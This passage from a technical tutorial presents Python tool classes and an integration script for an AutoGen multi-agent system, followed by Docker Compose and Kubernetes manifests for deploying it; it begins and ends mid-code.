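    "llm": {"temperature": 0.7, "max_tokens": 4000},
    "logging": {"level": "INFO", "log_file": "autogen.log"},
}
# Illustrative file contents: only two nested keys are overridden
file_config = {"llm": {"temperature": 0.2}, "logging": {"level": "DEBUG"}}

# Copy first so the defaults themselves stay untouched
merged = deep_update(copy.deepcopy(defaults), file_config)
print(merged["llm"])
print(merged["logging"])
```

A shallow `dict.update` would instead replace the whole `llm` section and silently drop `max_tokens`.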

4. Using Custom Tools with AutoGen

python
# agent_framework/custom_tools.py
import os
import json
import time
import logging
import requests
from typing import Dict, List, Any, Optional, Callable
from concurrent.futures import ThreadPoolExecutor

# Set up logging
logger = logging.getLogger("agent_tools")

class VectorDBTool:
    """Tool for interacting with vector databases for knowledge retrieval."""

    def __init__(self, api_key: str, api_url: str, embedding_model: str = "text-embedding-ada-002"):
        """
        Initialize the vector database tool.

        Args:
            api_key: API key for the vector database
            api_url: Base URL for the vector database API
            embedding_model: Model to use for embeddings
        """
        self.api_key = api_key
        self.api_url = api_url.rstrip('/')
        self.embedding_model = embedding_model
        self.headers = {
            "Content-Type": "application/json",
            "Authorization": f"Bearer {api_key}"
        }

    def search_knowledge_base(self, query: str, collection_name: str, limit: int = 5) -> List[Dict[str, Any]]:
        """
        Search the knowledge base for relevant documents.

        Args:
            query: The search query
            collection_name: Name of the collection to search
            limit: Maximum number of results to return

        Returns:
            List of relevant documents with their content and metadata
        """
        try:
            response = requests.post(
                f"{self.api_url}/search",
                headers=self.headers,
                json={
                    "query": query,
                    "collection_name": collection_name,
                    "limit": limit
                },
                timeout=30
            )

            response.raise_for_status()
            results = response.json().get("results", [])

            logger.info(f"Found {len(results)} documents matching query in collection {collection_name}")
            return results

        except Exception as e:
            logger.error(f"Error searching knowledge base: {str(e)}")
            return [{"error": str(e), "query": query}]

    def add_document(self, text: str, metadata: Dict[str, Any], collection_name: str) -> Dict[str, Any]:
        """
        Add a document to the knowledge base.

        Args:
            text: Document text
            metadata: Document metadata
            collection_name: Collection to add the document to

        Returns:
            Response with document ID and status
        """
        try:
            response = requests.post(
                f"{self.api_url}/documents",
                headers=self.headers,
                json={
                    "text": text,
                    "metadata": metadata,
                    "collection_name": collection_name
                },
                timeout=30
            )

            response.raise_for_status()
            result = response.json()

            logger.info(f"Added document {result.get('id')} to collection {collection_name}")
            return result

        except Exception as e:
            logger.error(f"Error adding document to knowledge base: {str(e)}")
            return {"error": str(e), "status": "failed"}


class WebSearchTool:
    """Tool for performing web searches and retrieving information."""

    def __init__(self, api_key: str, search_engine: str = "bing"):
        """
        Initialize the web search tool.

        Args:
            api_key: API key for the search service
            search_engine: Search engine to use (bing, google, etc.)
        """
        self.api_key = api_key
        self.search_engine = search_engine

        # Configure the appropriate API URL based on search engine
        if search_engine.lower() == "bing":
            self.api_url = "https://api.bing.microsoft.com/v7.0/search"
            self.headers = {
                "Ocp-Apim-Subscription-Key": api_key
            }
        elif search_engine.lower() == "google":
            self.api_url = "https://www.googleapis.com/customsearch/v1"
            # No headers for Google, API key is passed as a parameter
            self.headers = {}
        else:
            raise ValueError(f"Unsupported search engine: {search_engine}")

    def search(self, query: str, limit: int = 5) -> List[Dict[str, Any]]:
        """
        Perform a web search.

        Args:
            query: Search query
            limit: Maximum number of results to return

        Returns:
            List of search results with title, snippet, and URL
        """
        try:
            if self.search_engine.lower() == "bing":
                params = {
                    "q": query,
                    "count": limit,
                    "responseFilter": "Webpages",
                    "textFormat": "Raw"
                }
                response = requests.get(
                    self.api_url,
                    headers=self.headers,
                    params=params,
                    timeout=30
                )

                response.raise_for_status()
                raw_results = response.json().get("webPages", {}).get("value", [])

                # Normalize Bing's field names to title/snippet/url
                results = [
                    {
                        "title": result.get("name", ""),
                        "snippet": result.get("snippet", ""),
                        "url": result.get("url", "")
                    }
                    for result in raw_results
                ]

            elif self.search_engine.lower() == "google":
                params = {
                    "key": self.api_key,
                    "cx": "YOUR_CUSTOM_SEARCH_ENGINE_ID",  # Replace with your actual search engine ID
                    "q": query,
                    "num": limit
                }
                response = requests.get(
                    self.api_url,
                    params=params,
                    timeout=30
                )

                response.raise_for_status()
                raw_results = response.json().get("items", [])

                # Normalize Google's field names to title/snippet/url
                results = [
                    {
                        "title": result.get("title", ""),
                        "snippet": result.get("snippet", ""),
                        "url": result.get("link", "")
                    }
                    for result in raw_results
                ]

            else:
                # __init__ rejects other engines, so this only guards against later mutation
                results = []

            # Both branches fall through to here, so the search is always logged
            logger.info(f"Performed web search for '{query}' with {len(results)} results")
            return results

        except Exception as e:
            logger.error(f"Error performing web search: {str(e)}")
            return [{"error": str(e), "query": query}]


class DataAnalysisTool:
    """Tool for analyzing data and generating visualizations."""

    def __init__(self, work_dir: str = "data_analysis"):
        """
        Initialize the data analysis tool.

        Args:
            work_dir: Working directory for saving analysis outputs
        """
        self.work_dir = work_dir
        os.makedirs(work_dir, exist_ok=True)

    def analyze_data(self, data_json: str, analysis_type: str) -> Dict[str, Any]:
        """
        Analyze data and generate statistics.

        Args:
            data_json: JSON string containing data to analyze
            analysis_type: Type of analysis to perform (descriptive, correlation, etc.)

        Returns:
            Dictionary with analysis results
        """
        try:
            import pandas as pd
            import numpy as np

            # Parse the data
            try:
                # Try parsing as JSON
                data = json.loads(data_json)
                df = pd.DataFrame(data)
            except (ValueError, TypeError):
                # If not valid JSON (json.JSONDecodeError is a ValueError), try parsing as CSV
                import io
                df = pd.read_csv(io.StringIO(data_json))

            results = {"analysis_type": analysis_type, "columns": list(df.columns)}

            # Perform the specified analysis
            if analysis_type == "descriptive":
                results["descriptive_stats"] = json.loads(df.describe().to_json())
                results["missing_values"] = df.isnull().sum().to_dict()
                results["data_types"] = {col: str(dtype) for col, dtype in df.dtypes.items()}

            elif analysis_type == "correlation":
                # Calculate correlations for numeric columns
                numeric_df = df.select_dtypes(include=[np.number])
                if not numeric_df.empty:
                    correlations = numeric_df.corr().to_dict()
                    results["correlations"] = correlations
                else:
                    results["correlations"] = {}
                    results["warning"] = "No numeric columns available for correlation analysis"

            elif analysis_type == "timeseries":
                # Check if there's a date/time column
                date_cols = [col for col in df.columns if df[col].dtype == 'datetime64[ns]' or
                             'date' in col.lower() or 'time' in col.lower()]

                if date_cols:
                    date_col = date_cols[0]
                    if df[date_col].dtype != 'datetime64[ns]':
                        df[date_col] = pd.to_datetime(df[date_col], errors='coerce')

                    df = df.sort_values(by=date_col)
                    df.set_index(date_col, inplace=True)

                    # Get basic time series statistics
                    numeric_cols = df.select_dtypes(include=[np.number]).columns
                    results["timeseries_stats"] = {}

                    for col in numeric_cols:
                        col_stats = {}
                        # Compare the last value with the first; equal values count as "decreasing"
                        col_stats["trend"] = "increasing" if df[col].iloc[-1] > df[col].iloc[0] else "decreasing"
                        col_stats["min"] = float(df[col].min())
                        col_stats["max"] = float(df[col].max())
                        col_stats["start_value"] = float(df[col].iloc[0])
                        col_stats["end_value"] = float(df[col].iloc[-1])
                        col_stats["percent_change"] = float((df[col].iloc[-1] - df[col].iloc[0]) / df[col].iloc[0] * 100 if df[col].iloc[0] != 0 else 0)

                        results["timeseries_stats"][col] = col_stats
                else:
                    results["warning"] = "No date/time columns identified for time series analysis"

            logger.info(f"Completed {analysis_type} analysis on data with {len(df)} rows")
            return results

        except Exception as e:
            logger.error(f"Error analyzing data: {str(e)}")
            return {"error": str(e), "analysis_type": analysis_type}

    def generate_visualization(self, data_json: str, viz_type: str, params: Dict[str, Any]) -> Dict[str, Any]:
        """
        Generate a visualization from data.

        Args:
            data_json: JSON string containing data to visualize
            viz_type: Type of visualization (bar, line, scatter, etc.)
            params: Additional parameters for the visualization

        Returns:
            Dictionary with path to visualization and metadata
        """
        try:
            import pandas as pd
            import matplotlib.pyplot as plt
            import seaborn as sns
            from matplotlib.figure import Figure

            # Set the style
            plt.style.use('ggplot')

            # Parse the data
            try:
                # Try parsing as JSON
                data = json.loads(data_json)
                df = pd.DataFrame(data)
            except (ValueError, TypeError):
                # If not valid JSON (json.JSONDecodeError is a ValueError), try parsing as CSV
                import io
                df = pd.read_csv(io.StringIO(data_json))

            # Extract parameters
            x_column = params.get('x')
            y_column = params.get('y')
            title = params.get('title', f'{viz_type.capitalize()} Chart')
            xlabel = params.get('xlabel', x_column)
            ylabel = params.get('ylabel', y_column)
            figsize = params.get('figsize', (10, 6))

            # Create the figure
            fig = Figure(figsize=figsize)
            ax = fig.subplots()

            # Generate the specified visualization
            if viz_type == "bar":
                sns.barplot(x=x_column, y=y_column, data=df, ax=ax)

            elif viz_type == "line":
                sns.lineplot(x=x_column, y=y_column, data=df, ax=ax)

            elif viz_type == "scatter":
                hue = params.get('hue')
                if hue:
                    sns.scatterplot(x=x_column, y=y_column, hue=hue, data=df, ax=ax)
                else:
                    sns.scatterplot(x=x_column, y=y_column, data=df, ax=ax)

            elif viz_type == "histogram":
                bins = params.get('bins', 10)
                sns.histplot(df[x_column], bins=bins, ax=ax)

            elif viz_type == "heatmap":
                # Correlate numeric columns only; recent pandas versions raise on text columns
                corr = df.select_dtypes(include="number").corr()
                sns.heatmap(corr, annot=True, cmap='coolwarm', ax=ax)

            else:
                raise ValueError(f"Unsupported visualization type: {viz_type}")

            # Set labels and title
            ax.set_title(title)
            ax.set_xlabel(xlabel)
            ax.set_ylabel(ylabel)

            # Save the figure
            timestamp = int(time.time())
            filename = f"{viz_type}_{timestamp}.png"
            filepath = os.path.join(self.work_dir, filename)
            fig.savefig(filepath, dpi=100, bbox_inches='tight')

            logger.info(f"Generated {viz_type} visualization and saved to {filepath}")

            return {
                "visualization_type": viz_type,
                "filepath": filepath,
                "title": title,
                "dimensions": {
                    "x": x_column,
                    "y": y_column
                },
                "data_shape": {
                    "rows": len(df),
                    "columns": len(df.columns)
                }
            }

        except Exception as e:
            logger.error(f"Error generating visualization: {str(e)}")
            return {"error": str(e), "visualization_type": viz_type}


class APIIntegrationTool:
    """Tool for interacting with external APIs."""

    def __init__(self, api_configs: Dict[str, Dict[str, Any]]):
        """
        Initialize the API integration tool.

        Args:
            api_configs: Dictionary mapping API names to their configurations
        """
        self.api_configs = api_configs
        self.session = requests.Session()

    def call_api(self, api_name: str, endpoint: str, method: str = "GET",
                 params: Optional[Dict[str, Any]] = None,
                 data: Optional[Dict[str, Any]] = None,
                 headers: Optional[Dict[str, str]] = None) -> Dict[str, Any]:
        """
        Call an external API.

        Args:
            api_name: Name of the API (must be configured)
            endpoint: API endpoint to call
            method: HTTP method (GET, POST, etc.)
            params: Query parameters
            data: Request body for POST/PUT
            headers: Additional headers

        Returns:
            API response
        """
        if api_name not in self.api_configs:
            return {"error": f"API '{api_name}' not configured"}

        config = self.api_configs[api_name]
        base_url = config.get("base_url", "").rstrip('/')

        # Combine base headers with request-specific headers
        all_headers = config.get("headers", {}).copy()
        if headers:
            all_headers.update(headers)

        url = f"{base_url}/{endpoint.lstrip('/')}"

        try:
            response = self.session.request(
                method=method.upper(),
                url=url,
                params=params,
                json=data,
                headers=all_headers,
                timeout=config.get("timeout", 30)
            )

            response.raise_for_status()

            # Try to parse as JSON, fall back to text if the body is not JSON
            try:
                result = response.json()
            except ValueError:
                result = {"text_response": response.text}

            logger.info(f"Successfully called {api_name} API: {endpoint}")
            return result

        except Exception as e:
            logger.error(f"Error calling {api_name} API: {str(e)}")
            # Connection errors and timeouts carry response=None, so read the status defensively
            error_response = getattr(e, "response", None)
            return {
                "error": str(e),
                "api_name": api_name,
                "endpoint": endpoint,
                "status_code": getattr(error_response, "status_code", None)
            }


# Integration with AutoGen - Function mapping for tools

def register_tools_with_agent(agent, tools_config: Dict[str, Any]) -> Dict[str, Callable]:
    """
    Build the function map of custom tools for an AutoGen agent.

    The agent itself is not modified here; the caller attaches the returned map.

    Args:
        agent: AutoGen agent the tools are intended for
        tools_config: Tool configuration dictionary

    Returns:
        Dictionary mapping function names to tool functions
    """
    function_map = {}

    # Initialize vector database tool if configured
    if "vector_db" in tools_config:
        vector_db_config = tools_config["vector_db"]
        vector_db_tool = VectorDBTool(
            api_key=vector_db_config.get("api_key", ""),
            api_url=vector_db_config.get("api_url", ""),
            embedding_model=vector_db_config.get("embedding_model", "text-embedding-ada-002")
        )

        # Register vector database functions
        function_map["search_knowledge_base"] = vector_db_tool.search_knowledge_base
        function_map["add_document_to_knowledge_base"] = vector_db_tool.add_document

    # Initialize web search tool if configured
    if "web_search" in tools_config:
        web_search_config = tools_config["web_search"]
        web_search_tool = WebSearchTool(
            api_key=web_search_config.get("api_key", ""),
            search_engine=web_search_config.get("search_engine", "bing")
        )

        # Register web search functions
        function_map["web_search"] = web_search_tool.search

    # Initialize data analysis tool if configured
    if "data_analysis" in tools_config:
        data_analysis_config = tools_config["data_analysis"]
        data_analysis_tool = DataAnalysisTool(
            work_dir=data_analysis_config.get("work_dir", "data_analysis")
        )

        # Register data analysis functions
        function_map["analyze_data"] = data_analysis_tool.analyze_data
        function_map["generate_visualization"] = data_analysis_tool.generate_visualization

    # Initialize API integration tool if configured
    if "api_integration" in tools_config:
        api_integration_config = tools_config["api_integration"]
        api_integration_tool = APIIntegrationTool(
            api_configs=api_integration_config.get("api_configs", {})
        )

        # Register API integration functions
        function_map["call_api"] = api_integration_tool.call_api

    return function_map
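
The function map is a plain name-to-callable dictionary, so a tool call reduces to a lookup plus a keyword-argument call. A minimal sketch of that dispatch step follows, assuming the model supplies the tool name and a JSON string of arguments. `dispatch_tool_call` and `fake_web_search` are hypothetical names used for illustration; this is not AutoGen's internal implementation.

```python
import json
from typing import Any, Callable, Dict, List


def dispatch_tool_call(
    function_map: Dict[str, Callable[..., Any]], name: str, arguments_json: str
) -> Dict[str, Any]:
    """Look up a tool by name and call it with JSON-encoded keyword arguments."""
    if name not in function_map:
        return {"error": f"Unknown tool: {name}"}
    try:
        kwargs = json.loads(arguments_json)
    except json.JSONDecodeError as exc:
        return {"error": f"Invalid arguments: {exc}"}
    try:
        return {"result": function_map[name](**kwargs)}
    except Exception as exc:  # report tool failures to the caller instead of crashing
        return {"error": str(exc)}


def fake_web_search(query: str, limit: int = 5) -> List[Dict[str, str]]:
    """Stand-in for WebSearchTool.search that needs no network access."""
    return [{"title": f"Result {i} for {query}"} for i in range(limit)]


function_map = {"web_search": fake_web_search}
print(dispatch_tool_call(function_map, "web_search", '{"query": "kafka", "limit": 2}'))
print(dispatch_tool_call(function_map, "missing_tool", "{}"))
```

Returning an error dictionary rather than raising mirrors how the tool classes above report failures, so the calling agent always receives a value it can pass back to the model.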

5. Integration Example: Bringing It All Together

python
# app.py
import os
import json
import logging
from typing import Dict, List, Any, Optional

import autogen
from dotenv import load_dotenv

from agent_framework.advanced_config import AutoGenConfig
from agent_framework.specialized_agents import SpecializedAgentFactory
from agent_framework.agent_groups import AgentGroupFactory
from agent_framework.custom_tools import register_tools_with_agent

# Load environment variables from .env file
load_dotenv()

# Initialize logging
logging.basicConfig(
    level=logging.INFO,
    format='%(asctime)s - %(name)s - %(levelname)s - %(message)s'
)
logger = logging.getLogger(__name__)

class AIAgentSystem:
    """Main class for the AI Agent System."""

    def __init__(self, config_path: Optional[str] = None):
        """
        Initialize the AI Agent System.

        Args:
            config_path: Optional path to configuration file
        """
        self.config = AutoGenConfig(config_path)

        # Initialize the tool configurations
        self.tools_config = {
            "vector_db": {
                "api_key": os.environ.get("VECTOR_DB_API_KEY", ""),
                "api_url": os.environ.get("VECTOR_DB_API_URL", "https://api.yourvectordb.com/v1"),
                "embedding_model": "text-embedding-ada-002"
            },
            "web_search": {
                "api_key": os.environ.get("SEARCH_API_KEY", ""),
                "search_engine": "bing"
            },
            "data_analysis": {
                "work_dir": "data_analysis_workspace"
            },
            "api_integration": {
                "api_configs": {
                    "weather": {
                        "base_url": "https://api.weatherapi.com/v1",
                        "headers": {
                            "key": os.environ.get("WEATHER_API_KEY", "")
                        },
                        "timeout": 10
                    },
                    "news": {
                        "base_url": "https://newsapi.org/v2",
                        "headers": {
                            "X-Api-Key": os.environ.get("NEWS_API_KEY", "")
                        },
                        "timeout": 10
                    }
                }
            }
        }

        # Create factories for building agents and groups
        self.agent_factory = SpecializedAgentFactory(self.config.get_llm_config())
        self.group_factory = AgentGroupFactory(self.config.get_llm_config())

        # Track created groups for reuse
        self.agent_groups = {}

    def create_group_chat_agents(self, user_input: Optional[str] = None) -> Dict[str, Any]:
        """
        Create a group chat with multiple specialized agents.

        Args:
            user_input: Optional initial user input (currently unused)

        Returns:
            Dictionary containing the group chat components
        """
        # Create a user proxy agent
        user_proxy = autogen.UserProxyAgent(
            name="User",
            human_input_mode="TERMINATE",  # Allow human input when needed
            max_consecutive_auto_reply=self.config.get_termination_config().get("max_consecutive_auto_reply", 10),
            code_execution_config=self.config.get_user_proxy_config().get("code_execution_config")
        )

        # Create the group chat
        group = self.group_factory.create_groupchat(user_proxy=user_proxy)

        # Cache the group for later use
        group_id = f"groupchat_{len(self.agent_groups) + 1}"
        self.agent_groups[group_id] = group

        # Return the group with its ID
        return {
            "group_id": group_id,
            **group
        }

    def create_hierarchical_team(self, user_input: Optional[str] = None) -> Dict[str, Any]:
        """
        Create a hierarchical team with a manager and specialists.

        Args:
            user_input: Optional initial user input (currently unused)

        Returns:
            Dictionary containing the team components
        """
        # Create a user proxy agent
        user_proxy = autogen.UserProxyAgent(
            name="User",
            human_input_mode="TERMINATE",
            max_consecutive_auto_reply=self.config.get_termination_config().get("max_consecutive_auto_reply", 10),
            code_execution_config=self.config.get_user_proxy_config().get("code_execution_config")
        )

        # Create the hierarchical team
        team = self.group_factory.create_hierarchical_team(user_proxy=user_proxy)

        # Register tools with each specialist agent
        for name, agent in team["team"]["specialists"].items():
            function_map = register_tools_with_agent(agent, self.tools_config)
            # ConversableAgent.register_function (AutoGen 0.2.x) merges the mapping
            # into the agent's existing function map
            agent.register_function(function_map=function_map)

        # Cache the team for later use
        team_id = f"team_{len(self.agent_groups) + 1}"
        self.agent_groups[team_id] = team

        # Return the team with its ID
        return {
            "team_id": team_id,
            **team
        }

    def execute_agent_group(self, group_id: str, problem: str) -> Dict[str, Any]:
        """
        Execute an agent group on a problem.

        Args:
            group_id: ID of the agent group to use
            problem: Problem to solve

        Returns:
            Results of the execution
        """
        if group_id not in self.agent_groups:
            raise ValueError(f"Unknown group ID: {group_id}")

        group = self.agent_groups[group_id]

        # Execute the group on the problem
        return group["execute"](problem)

    def run_competitive_evaluation(self, problem: str) -> Dict[str, Any]:
        """
        Run a competitive evaluation where multiple agents solve a problem
        and a judge evaluates their solutions.

        Args:
            problem: Problem to solve

        Returns:
            Evaluation results
        """
        # Create a user proxy agent that never asks for human input
        user_proxy = autogen.UserProxyAgent(
            name="User",
            human_input_mode="NEVER",
            max_consecutive_auto_reply=self.config.get_termination_config().get("max_consecutive_auto_reply", 10),
            code_execution_config=self.config.get_user_proxy_config().get("code_execution_config")
        )

        # Create the competitive evaluation team
        evaluation = self.group_factory.create_competitive_evaluation_team(user_proxy=user_proxy)

        # Execute the evaluation
        return evaluation["execute"](problem)

# Example usage
if __name__ == "__main__":
    # Initialize the system
    agent_system = AIAgentSystem()

    # Create a hierarchical team
    team = agent_system.create_hierarchical_team()
    team_id = team["team_id"]

    # Example problem to solve
    problem = """
    We need to analyze customer sentiment from our product reviews. The data is in a CSV format with the following columns:
    - review_id: unique identifier for each review
    - product_id: identifier for the product
    - rating: numeric rating (1-5)
    - review_text: the text of the review
    - review_date: date when the review was posted

    The goal is to:
    1. Analyze the sentiment of each review
    2. Identify common themes in positive and negative reviews
    3. Track sentiment trends over time
    4. Recommend actions based on the findings

    The data can be found in this CSV: https://example.com/customer_reviews.csv (Note: this is a placeholder URL)
    """

    # Execute the team on the problem
    results = agent_system.execute_agent_group(team_id, problem)

    # Print the final solution
    print("FINAL SOLUTION:")
    print(results.get("final_solution", "No solution found"))

Deploying Your AI Agents with Docker, Kubernetes, or Cloud Hosting

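Running an agent system at scale means running more than the agents themselves: the API, background workers, data stores, and monitoring all have to be deployed together. The sections below cover two approaches, Docker Compose and Kubernetes.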

Docker Deployment

Create a docker-compose.yml that defines the API, Celery worker and scheduler, Flower, PostgreSQL, Redis, Nginx, Prometheus, and Grafana services:

yaml
version: '3.8'

services:
  # API service for AI agents
  agent-api:
    build:
      context: .
      dockerfile: Dockerfile
    ports:
      - "8000:8000"
    volumes:
      - ./app:/app
      - ./data:/data
    environment:
      - OPENAI_API_KEY=${OPENAI_API_KEY}
      - PINECONE_API_KEY=${PINECONE_API_KEY}
      - PINECONE_ENVIRONMENT=${PINECONE_ENVIRONMENT}
      - DEBUG=False
      - LOG_LEVEL=INFO
      - DATABASE_URL=postgresql://postgres:postgres@postgres:5432/agent_db
    depends_on:
      - postgres
      - redis
    networks:
      - agent-network
    restart: unless-stopped
    command: uvicorn app.main:app --host 0.0.0.0 --port 8000
    healthcheck:
      test: ["CMD", "curl", "-f", "http://localhost:8000/health"]
      interval: 30s
      timeout: 10s
      retries: 3
      start_period: 40s

  # Celery worker for background tasks
  worker:
    build:
      context: .
      dockerfile: Dockerfile
    volumes:
      - ./app:/app
      - ./data:/data
    environment:
      - OPENAI_API_KEY=${OPENAI_API_KEY}
      - PINECONE_API_KEY=${PINECONE_API_KEY}
      - PINECONE_ENVIRONMENT=${PINECONE_ENVIRONMENT}
      - DEBUG=False
      - LOG_LEVEL=INFO
      - DATABASE_URL=postgresql://postgres:postgres@postgres:5432/agent_db
    depends_on:
      - postgres
      - redis
    networks:
      - agent-network
    restart: unless-stopped
    command: celery -A app.celery_app worker --loglevel=info
    healthcheck:
      test: ["CMD", "celery", "-A", "app.celery_app", "inspect", "ping"]
      interval: 30s
      timeout: 10s
      retries: 3
      start_period: 40s

  # Celery beat for scheduled tasks
  scheduler:
    build:
      context: .
      dockerfile: Dockerfile
    volumes:
      - ./app:/app
      - ./data:/data
    environment:
      - OPENAI_API_KEY=${OPENAI_API_KEY}
      - PINECONE_API_KEY=${PINECONE_API_KEY}
      - PINECONE_ENVIRONMENT=${PINECONE_ENVIRONMENT}
      - DEBUG=False
      - LOG_LEVEL=INFO
      - DATABASE_URL=postgresql://postgres:postgres@postgres:5432/agent_db
    depends_on:
      - postgres
      - redis
    networks:
      - agent-network
    restart: unless-stopped
    command: celery -A app.celery_app beat --loglevel=info

  # Flower for monitoring Celery
  flower:
    build:
      context: .
      dockerfile: Dockerfile
    ports:
      - "5555:5555"
    environment:
      - CELERY_BROKER_URL=redis://redis:6379/0
      - FLOWER_BASIC_AUTH=${FLOWER_USER}:${FLOWER_PASSWORD}
    depends_on:
      - redis
      - worker
    networks:
      - agent-network
    restart: unless-stopped
    command: celery -A app.celery_app flower --port=5555

  # PostgreSQL database
  postgres:
    image: postgres:14
    ports:
      - "5432:5432"
    environment:
      - POSTGRES_USER=postgres
      - POSTGRES_PASSWORD=postgres
      - POSTGRES_DB=agent_db
    volumes:
      - postgres-data:/var/lib/postgresql/data
    networks:
      - agent-network
    restart: unless-stopped
    healthcheck:
      test: ["CMD-SHELL", "pg_isready -U postgres"]
      interval: 10s
      timeout: 5s
      retries: 5

  # Redis for Celery broker and caching
  redis:
    image: redis:7-alpine
    ports:
      - "6379:6379"
    volumes:
      - redis-data:/data
    networks:
      - agent-network
    restart: unless-stopped
    healthcheck:
      test: ["CMD", "redis-cli", "ping"]
      interval: 10s
      timeout: 5s
      retries: 5

  # Nginx for serving the frontend and API
  nginx:
    image: nginx:1.23-alpine
    ports:
      - "80:80"
      - "443:443"
    volumes:
      - ./nginx/nginx.conf:/etc/nginx/nginx.conf
      - ./nginx/conf.d:/etc/nginx/conf.d
      - ./frontend/build:/usr/share/nginx/html
      - ./data/certbot/conf:/etc/letsencrypt
      - ./data/certbot/www:/var/www/certbot
    depends_on:
      - agent-api
    networks:
      - agent-network
    restart: unless-stopped

  # Prometheus for metrics
  prometheus:
    image: prom/prometheus:v2.40.0
    ports:
      - "9090:9090"
    volumes:
      - ./prometheus/prometheus.yml:/etc/prometheus/prometheus.yml
      - prometheus-data:/prometheus
    networks:
      - agent-network
    restart: unless-stopped

  # Grafana for visualization
  grafana:
    image: grafana/grafana:9.3.0
    ports:
      - "3000:3000"
    environment:
      - GF_SECURITY_ADMIN_USER=${GRAFANA_USER}
      - GF_SECURITY_ADMIN_PASSWORD=${GRAFANA_PASSWORD}
    volumes:
      - grafana-data:/var/lib/grafana
      - ./grafana/provisioning:/etc/grafana/provisioning
    depends_on:
      - prometheus
    networks:
      - agent-network
    restart: unless-stopped

networks:
  agent-network:
    driver: bridge

volumes:
  postgres-data:
  redis-data:
  prometheus-data:
  grafana-data:

Kubernetes Deployment

For large-scale enterprise deployments, Kubernetes adds declarative rolling updates, health-checked restarts, and autoscaling on top of the same container images.

Create a namespace for your agent system:

yaml
# agent-namespace.yaml
apiVersion: v1
kind: Namespace
metadata:
  name: ai-agents
  labels:
    name: ai-agents

ConfigMap for application settings:

yaml
# agent-configmap.yaml
apiVersion: v1
kind: ConfigMap
metadata:
  name: agent-config
  namespace: ai-agents
data:
  LOG_LEVEL: "INFO"
  DEBUG: "False"
  CACHE_TTL: "3600"
  MAX_AGENT_INSTANCES: "10"
  ALLOWED_ORIGINS: "https://example.com,https://api.example.com"
  AGENT_TIMEOUT: "300"
  MONITORING_ENABLED: "True"

Secret for sensitive information:

yaml
# agent-secrets.yaml
apiVersion: v1
kind: Secret
metadata:
  name: agent-secrets
  namespace: ai-agents
type: Opaque
data:
  OPENAI_API_KEY: <base64-encoded-key>
  PINECONE_API_KEY: <base64-encoded-key>
  PINECONE_ENVIRONMENT: <base64-encoded-value>
  POSTGRES_PASSWORD: <base64-encoded-password>
  REDIS_PASSWORD: <base64-encoded-password>
  ADMIN_API_KEY: <base64-encoded-key>
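
Values under a Secret's `data:` key must be base64-encoded. The following is a minimal sketch of producing and checking such a value; the helper names `encode_secret_value` and `decode_secret_value` are illustrative and not part of any library, and the key shown is a dummy.

```python
import base64


def encode_secret_value(plaintext: str) -> str:
    """Return the base64 text expected under a Secret's `data:` key."""
    return base64.b64encode(plaintext.encode("utf-8")).decode("ascii")


def decode_secret_value(encoded: str) -> str:
    """Reverse the encoding, e.g. to verify a manifest before applying it."""
    return base64.b64decode(encoded).decode("utf-8")


# Dummy value for illustration only; never commit real keys to a manifest.
encoded = encode_secret_value("not-a-real-key")
print(encoded)
print(decode_secret_value(encoded))
```

Base64 is an encoding, not encryption, so the manifest should be treated as sensitive. Kubernetes also accepts plaintext values under `stringData:` and encodes them on write, which avoids this step entirely.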

API Service deployment:

yaml
# agent-api-deployment.yaml
apiVersion: apps/v1
kind: Deployment
metadata:
  name: agent-api
  namespace: ai-agents
  labels:
    app: agent-api
spec:
  replicas: 3
  selector:
    matchLabels:
      app: agent-api
  strategy:
    type: RollingUpdate
    rollingUpdate:
      maxSurge: 1
      maxUnavailable: 0
  template:
    metadata:
      labels:
        app: agent-api
      annotations:
        prometheus.io/scrape: "true"
        prometheus.io/port: "8000"
        prometheus.io/path: "/metrics"
    spec:
      containers:
        - name: agent-api
          image: your-registry/agent-api:1.0.0
          imagePullPolicy: Always
          ports:
            - containerPort: 8000
          resources:
            requests:
              memory: "1Gi"
              cpu: "500m"
            limits:
              memory: "2Gi"
              cpu: "1"
          env:
            - name: OPENAI_API_KEY
              valueFrom:
                secretKeyRef:
                  name: agent-secrets
                  key: OPENAI_API_KEY
            - name: PINECONE_API_KEY
              valueFrom:
                secretKeyRef:
                  name: agent-secrets
                  key: PINECONE_API_KEY
            - name: PINECONE_ENVIRONMENT
              valueFrom:
                secretKeyRef:
                  name: agent-secrets
                  key: PINECONE_ENVIRONMENT
            # $(VAR) expansion only sees variables defined earlier in this
            # list, so the passwords must be declared before the URLs.
            - name: POSTGRES_PASSWORD
              valueFrom:
                secretKeyRef:
                  name: agent-secrets
                  key: POSTGRES_PASSWORD
            - name: REDIS_PASSWORD
              valueFrom:
                secretKeyRef:
                  name: agent-secrets
                  key: REDIS_PASSWORD
            - name: DATABASE_URL
              value: "postgresql://postgres:$(POSTGRES_PASSWORD)@postgres:5432/agent_db"
            - name: REDIS_URL
              value: "redis://:$(REDIS_PASSWORD)@redis:6379/0"
          envFrom:
            - configMapRef:
                name: agent-config
          readinessProbe:
            httpGet:
              path: /health
              port: 8000
            initialDelaySeconds: 15
            periodSeconds: 10
          livenessProbe:
            httpGet:
              path: /health
              port: 8000
            initialDelaySeconds: 30
            periodSeconds: 20
          volumeMounts:
            - name: agent-data
              mountPath: /data
      volumes:
        # Shared by several replicas: the claim needs an access mode that
        # allows this (ReadWriteMany if pods land on different nodes).
        - name: agent-data
          persistentVolumeClaim:
            claimName: agent-data-pvc

Service to expose the API:

yaml
# agent-api-service.yaml
apiVersion: v1
kind: Service
metadata:
  name: agent-api
  namespace: ai-agents
  labels:
    app: agent-api
spec:
  selector:
    app: agent-api
  ports:
    - port: 80
      targetPort: 8000
  type: ClusterIP

Worker deployment for processing tasks:

yaml
# agent-worker-deployment.yaml
apiVersion: apps/v1
kind: Deployment
metadata:
  name: agent-worker
  namespace: ai-agents
  labels:
    app: agent-worker
spec:
  replicas: 5
  selector:
    matchLabels:
      app: agent-worker
  template:
    metadata:
      labels:
        app: agent-worker
    spec:
      containers:
        - name: agent-worker
          image: your-registry/agent-worker:1.0.0
          imagePullPolicy: Always
          resources:
            requests:
              memory: "2Gi"
              cpu: "1"
            limits:
              memory: "4Gi"
              cpu: "2"
          env:
            - name: OPENAI_API_KEY
              valueFrom:
                secretKeyRef:
                  name: agent-secrets
                  key: OPENAI_API_KEY
            - name: PINECONE_API_KEY
              valueFrom:
                secretKeyRef:
                  name: agent-secrets
                  key: PINECONE_API_KEY
            - name: PINECONE_ENVIRONMENT
              valueFrom:
                secretKeyRef:
                  name: agent-secrets
                  key: PINECONE_ENVIRONMENT
            # $(VAR) expansion only sees variables defined earlier in this
